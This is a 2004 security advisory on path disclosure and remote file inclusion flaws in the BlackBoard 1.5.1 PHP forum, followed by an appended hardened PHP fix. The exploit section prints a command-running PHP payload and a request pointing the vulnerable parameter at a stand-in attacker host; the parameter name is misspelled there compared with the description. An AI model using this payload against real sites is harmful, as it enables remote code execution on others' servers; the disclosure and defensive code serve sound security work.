
| Subject: | [UNIX] BlackBoard Path Disclosure and File Inclusion Vulnerabilities |
|---|---|
| Date: | 11 Oct 2004 19:16:48 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

BlackBoard Path Disclosure and File Inclusion Vulnerabilities
------------------------------------------------------------------------

SUMMARY

<http://blackboard.unclassified.de/> BlackBoard is "an open-source, PHP-based internet bulletin board software, almost like any other around". Two vulnerabilities have been discovered in BlackBoard: a path disclosure vulnerability and a file inclusion vulnerability. Using the file inclusion vulnerability it is possible to cause the remote site to execute arbitrary code; using the path disclosure vulnerability it is possible to discover the true path under which the product has been installed.

DETAILS

Vulnerable Systems:
 * BlackBoard version 1.5.1

Path Disclosure:
By requesting the following file it is possible to retrieve the actual path under which the BlackBoard product is installed:

    http://target/bb_lib/checkdb.inc.php

The response would look like:

    Warning: main(lang/_more.php): failed to open stream: No such file or directory in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
    Fatal error: main(): Failed opening required 'lang/_more.php' (include_path='.:/usr/local/lib/php') in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15

The same issue also occurs in admin.inc.php, cp.inc.php and others.

File Inclusion:
The /bb_lib/admin.inc.php file incorrectly uses the following unsanitized require function call:

    require($libpath . 'lang/' . $LANG . '_more.php');

This means anyone can replace the libpath parameter with whichever file they desire, causing the inclusion of arbitrary files.

Exploit:
Create a file called _more.php on your web site with the following content:

    <?
    system("uname -a;id;ls -al");
    ?>

Then issue a request such as the following to cause it to be included and executed:

    http://target/bb_lib/checkdb.inc.php?libpach=http://evilhost.com/

Vendor response:
The vendor has issued a patch that addresses these issues.

ADDITIONAL INFORMATION

The information has been provided by <mailto:Cracklove@gmail.com> Lin Xiaofeng.
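A hardened form of the `require` call described above, as an added example that is not BlackBoard's code and not the vendor's patch: the base path becomes a server-side constant, the language code is checked against an allow-list, and PHP warnings are logged rather than displayed. The names `BB_LIB_DIR`, `BB_LANGS`, `bb_lang_file()` and the `lang` request parameter are assumptions made for illustration.

```php
<?php
// Added example: not BlackBoard's code and not the vendor's patch.
// BB_LIB_DIR, BB_LANGS and bb_lang_file() are hypothetical names.

// Path disclosure: log PHP warnings instead of sending them, with the
// install path in them, to the client.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// File inclusion: the base path is a constant fixed on the server. Unlike
// the $libpath variable in the advisory, a request parameter cannot set it.
define('BB_LIB_DIR', __DIR__ . '/');

// Allow-list of installed language codes (constructed sample values).
const BB_LANGS = ['en', 'de'];

// Returns the absolute path of the language file, or null if it is
// missing or resolves outside BB_LIB_DIR/lang/.
function bb_lang_file(string $lang): ?string
{
    // Only exact allow-list entries pass, so "../", URL schemes and
    // other path syntax never reach the file name.
    if (!in_array($lang, BB_LANGS, true)) {
        $lang = BB_LANGS[0];
    }
    $base = realpath(BB_LIB_DIR . 'lang');
    $real = realpath(BB_LIB_DIR . 'lang/' . $lang . '_more.php');
    if ($base === false || $real === false) {
        return null;
    }
    // Defence in depth: the resolved file must sit directly under lang/.
    return dirname($real) === $base ? $real : null;
}

// The request may choose a language code, never a path.
$lang = $_GET['lang'] ?? BB_LANGS[0];
$file = bb_lang_file(is_string($lang) ? $lang : BB_LANGS[0]);
if ($file === null) {
    error_log('language file unavailable for this request');
    http_response_code(500);
    exit('Internal error');
}
require $file;
```

On PHP 5.2 and later, `allow_url_include` is off by default, which blocks remote URLs in `require`; inclusion of local paths still needs the checks above.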